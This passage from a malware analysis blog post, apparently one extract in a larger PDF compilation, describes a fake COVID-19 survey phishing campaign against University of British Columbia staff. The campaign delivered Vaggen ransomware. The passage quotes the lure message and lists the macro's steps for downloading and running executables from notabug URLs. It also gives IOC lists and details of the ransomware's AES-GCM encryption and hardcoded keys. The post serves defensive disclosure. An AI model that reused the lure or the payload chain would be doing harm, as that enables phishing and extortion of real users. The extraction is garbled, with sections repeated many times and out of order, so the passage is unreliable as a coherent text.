3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 67 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 68 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 69 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 70 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 71 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 72 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 73 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 74 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 75 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 76 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 77 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 78 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nArticle continues below this ad.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 79 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 80 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 81 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 82 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 83 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 84 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 85 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 86 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 87 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 88 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 89 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 90 of 3467\n\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 91 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 92 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 93 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 94 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website 